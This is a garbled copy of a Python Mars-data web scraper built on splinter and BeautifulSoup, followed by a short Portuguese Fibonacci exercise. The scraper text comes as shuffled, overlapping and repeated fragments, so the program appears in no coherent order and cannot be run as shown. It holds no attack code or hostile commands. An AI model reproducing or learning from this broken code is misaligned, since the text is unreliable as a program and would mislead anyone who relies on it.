"time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image'", "= soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search =", "= search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p =", "class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1)", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full", "')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do all of the step above", "browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL", "mars_table = facts_table[0] mars_table 
= mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars", "above for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1)", "BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars", "to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url", "BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url", "'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title", "= 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image", "each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1)", "Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html", "'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article')", "= facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet", "img_link #do all of the step above for each hemisphere img_urls =[] titles=[]", "import BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'}", "time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search", "= browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view')", "clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and", "= mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table", "Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'", "data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent =", "= soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup", "range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 
'html.parser') img_search", "')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i", "= soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the", "mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "#get html again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser')", "{0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url", "= soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just getting rid", "scrape(): import pandas as pd from splinter import Browser from bs4 import BeautifulSoup", "= soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html", "res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup", "= BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search", "Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent", "mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url", "= soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = []", "'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url +", "= pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table", "BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the", "the step above for each hemisphere img_urls =[] titles=[] for i in range(4):", "img_link = base_url + img_search[0]['src'] img_link #do all of the step above for", "image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click()", "mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup =", "to the page 
with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after", "dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click", "user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html", "'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more", "'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data", "def scrape(): import pandas as pd from splinter import Browser from bs4 import", "at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link =", "full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url =", "+ img_search[0]['src'] img_link #do all of the step above for each hemisphere img_urls", "class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p", "soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/'", "search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text", "= title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2)", "= f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup", "html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search =", "'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_=", "soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div',", "BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser", "img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2)", "featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html", "Browser from bs4 import 
BeautifulSoup import time #dictionary with all data mars_data={} executable_path", "#click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html", "x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search", "full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more", "in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click", "coding: utf-8 def scrape(): import pandas as pd from splinter import Browser from", "browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text", "= browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search =", ") title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at the end, just", "html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get", "get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again", "soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split('", "time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome',", "10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html,", "step above for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url)", "rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link #do", "mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the", "search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title", "browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)')", "module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title =", "with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html", "= Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1", "had the word 'enhanced' at the end, just getting rid of that '", "# coding: utf-8 def scrape(): import pandas as pd from splinter import Browser", "soup = BeautifulSoup(html, 'html.parser') #find image link 
and title img_search = soup.find_all('img',class_='wide-image' )", "p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to", "facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') facts_table =", "from splinter import Browser from bs4 import BeautifulSoup import time #dictionary with all", "from bs4 import BeautifulSoup import time #dictionary with all data mars_data={} executable_path =", "img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word 'enhanced' at", "for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup =", "#!/usr/bin/env python # coding: utf-8 def scrape(): import pandas as pd from splinter", "#click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info", "+ img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4):", "= search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary", "news_title = title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'", "featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "= [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls", "BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html", "html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather", "button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse", "image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url featured_img_url twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url)", "base_url + img_search[0]['src'] img_link #do all of the step above for each hemisphere", "tweet_search = soup.find_all('article') mars_weather=tweet_search[0].find_all('span')[4].text mars_data['mars_weather']=mars_weather mars_weather facts_url = 'https://space-facts.com/mars/' browser.visit(facts_url) html = browser.html", "mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 
'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/'", "the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button", "##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the page html", "'html.parser') #click the image link to get to the page with the full", "mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the full", "the image link to get to the page with the full res image", "mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left') hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html", "'.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for", "browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to", "hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={}", "browser.html soup = BeautifulSoup(html, 'html.parser') #click the image link to get to the", "url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search =", "= 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section',", "twitter_url = 'https://twitter.com/MarsWxReport?lang=en' browser.visit(twitter_url) time.sleep(2) html = browser.html soup = BeautifulSoup(html, 'html.parser') tweet_search", "hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html", "'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64;", "html = browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module", "= 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html, 'html.parser')", "of the step above for each hemisphere img_urls =[] titles=[] for i in", "getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src'] img_link", "facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''})", "import Browser from bs4 import BeautifulSoup import time #dictionary with all data mars_data={}", "BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_=", "headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1)", "#find the link to the full size image img_partial = 
soup.find_all('img',class_='main_image')[0]['src'] featured_img_url =", "image link to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click()", "title_search[0].a.text news_p = p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html", "link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src'] featured_img_url = f'https://www.jpl.nasa.gov{img_partial}' mars_data['featured_img_url']=featured_img_url", "image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup =", "image link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had", "= browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the full size", "browser.html soup = BeautifulSoup(html, 'html.parser') search = soup.find('section', class_= 'grid_gallery module list_view') title_search", "and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the word", "= {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT", "utf-8 def scrape(): import pandas as pd from splinter import Browser from bs4", "img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in", "= BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial =", "Browser('chrome', **executable_path, headless=True, user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 =", "#parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link", "word 'enhanced' at the end, just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1])", "button click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser')", "'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html", "img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src'])", "browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' )", "pd.read_html(facts_url) mars_table = facts_table[0] mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table =", "just getting rid of that ' '.join(title_search[0].text.split(' ')[:-1]) img_link = base_url + img_search[0]['src']", "BeautifulSoup(html, 'html.parser') #click the image link to get to the page with the", "= {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True) mars_table mars_table.to_html('mars_html') mars_data['mars_facts']=mars_table.to_html(justify='left')", "urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls return", "browser.visit(facts_url) html = browser.html soup = BeautifulSoup(html, 'html.parser') 
facts_table = pd.read_html(facts_url) mars_table =", "pd from splinter import Browser from bs4 import BeautifulSoup import time #dictionary with", "again after clicking page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image", "search = soup.find('section', class_= 'grid_gallery module list_view') title_search = search.find_all('div', class_= 'content_title',limit=1) p_search", "#click the image link to get to the page with the full res", "mars_table = mars_table.rename(columns = {0:'Mars Planet Profile',1:''}) mars_table = mars_table.set_index('Mars Planet Profile', drop=True)", "click1=browser.find_by_css('a[class=\"button fancybox\"]').click() ##click1=browser.links.find_by_partial_text('FULL IMAGE').click() #click the more info button click2=browser.links.find_by_partial_text('more info').click() #parse the", "click2=browser.links.find_by_partial_text('more info').click() #parse the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find", "titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup", "hemisphere_url = 'https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars' base_url = 'https://astrogeology.usgs.gov/' browser.visit(hemisphere_url) html = browser.html soup = BeautifulSoup(html,", "browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html soup = BeautifulSoup(html, 'html.parser') img_search =", "browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title img_search = soup.find_all('img',class_='wide-image'", "pandas as pd from splinter import Browser from bs4 import BeautifulSoup import time", "browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table =", "link and title img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') #titles had the", "= BeautifulSoup(html, 'html.parser') img_search = soup.find_all('img',class_='wide-image' ) title_search = soup.find_all('h2',class_='title') titles.append(' '.join(title_search[0].text.split(' ')[:-1]))", "the page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to", "with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser = Browser('chrome', **executable_path, headless=True,", "= p_search[0].text #add data to dictionary mars_data['news_title']=news_title mars_data['news_p']=news_p url_2='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars' browser.visit(url_2) html = browser.html", "browser.find_by_css('img[class=\"thumb\"]')[0].click() #get html again after clicking page html = browser.html soup = BeautifulSoup(html,", "=[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click() time.sleep(1) html = browser.html", "={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls return mars_data", "NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup =", "class_= 'content_title',limit=1) p_search = search.find_all('div', class_='article_teaser_body',limit=1) news_title = title_search[0].a.text news_p = 
p_search[0].text #add", "#titles had the word 'enhanced' at the end, just getting rid of that", "(Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html = browser.html soup", "bs4 import BeautifulSoup import time #dictionary with all data mars_data={} executable_path = {'executable_path':", "page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find the link to the", "import time #dictionary with all data mars_data={} executable_path = {'executable_path': 'chromedriver.exe'} browser =", "= browser.html soup = BeautifulSoup(html, 'html.parser') #click the full image button click1=browser.find_by_css('a[class=\"button fancybox\"]').click()", "= browser.html soup = BeautifulSoup(html, 'html.parser') facts_table = pd.read_html(facts_url) mars_table = facts_table[0] mars_table", "titles.append(' '.join(title_search[0].text.split(' ')[:-1])) img_urls.append(base_url + img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={}", "link to get to the page with the full res image browser.find_by_css('img[class=\"thumb\"]')[0].click() #get", "splinter import Browser from bs4 import BeautifulSoup import time #dictionary with all data", "BeautifulSoup(html, 'html.parser') #find the link to the full size image img_partial = soup.find_all('img',class_='main_image')[0]['src']", "for each hemisphere img_urls =[] titles=[] for i in range(4): browser.visit(hemisphere_url) time.sleep(1) browser.find_by_css('img[class=\"thumb\"]')[i].click()", "[] urls ={} for i in range(4): urls['title']=titles[i] urls['img_url']=img_urls[i] hemisphere_image_urls.append(urls) urls={} mars_data['hemisphere_image_urls']=hemisphere_image_urls hemisphere_image_urls", "img_search[0]['src']) img_urls titles hemisphere_image_urls = [] urls ={} for i in range(4): urls['title']=titles[i]", "page html = browser.html soup = BeautifulSoup(html, 'html.parser') #find image link and title", "= 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)') url_1 = 'https://mars.nasa.gov/news/' browser.visit(url_1) html =" ]
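A minimal usage sketch for the scraper above (assumptions: chromedriver.exe is reachable on the PATH and the scraped pages still serve the markup the selectors expect; the pprint call is just for inspection and is not part of the original file):

if __name__ == '__main__':
    from pprint import pprint
    # scrape() returns the dict built above: news, featured image,
    # weather tweet, facts-table HTML, and hemisphere image URLs
    pprint(scrape())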
[ "while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número da", "= int(input('Digite a posição desejada para saber o número de Fibonacci: ')) while", "<filename>python/exercicios_avaliativos/cap_3/fibonacci.py f = [] f.append(1) f.append(1) n = 0 test = int(input('Digite a", "número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n +=", "n += 1 print('O número da posição {} é: {} na sequência de", "de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n += 1", "f.append(f[n] + f[n+1]) n += 1 print('O número da posição {} é: {}", "= 0 test = int(input('Digite a posição desejada para saber o número de", "<= test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição {}", "= [] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada", "saber o número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1])", "Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O", "f = [] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição", "f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada para saber", "0 test = int(input('Digite a posição desejada para saber o número de Fibonacci:", "o número de Fibonacci: ')) while n <= test: f.append(f[n] + f[n+1]) n", "f.append(1) n = 0 test = int(input('Digite a posição desejada para saber o", "1 print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1, f[n-2]))", "test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição {} é:", "+= 1 print('O número da posição {} é: {} na sequência de Fibonacci!'.format(n-1,", "[] f.append(1) f.append(1) n = 0 test = int(input('Digite a posição desejada para", "para saber o número de Fibonacci: ')) while n <= test: f.append(f[n] +", "+ f[n+1]) n += 1 print('O número da posição {} é: {} na", "a posição desejada para saber o número de Fibonacci: ')) while n <=", "test = int(input('Digite a posição desejada para saber o número de Fibonacci: '))", "n = 0 test = int(input('Digite a posição desejada para saber o número", "')) while n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número", "n <= test: f.append(f[n] + f[n+1]) n += 1 print('O número da posição", "posição desejada para saber o número de Fibonacci: ')) while n <= test:", "f[n+1]) n += 1 print('O número da posição {} é: {} na sequência", "int(input('Digite a posição desejada para saber o número de Fibonacci: ')) while n", "desejada para saber o número de Fibonacci: ')) while n <= test: f.append(f[n]" ]
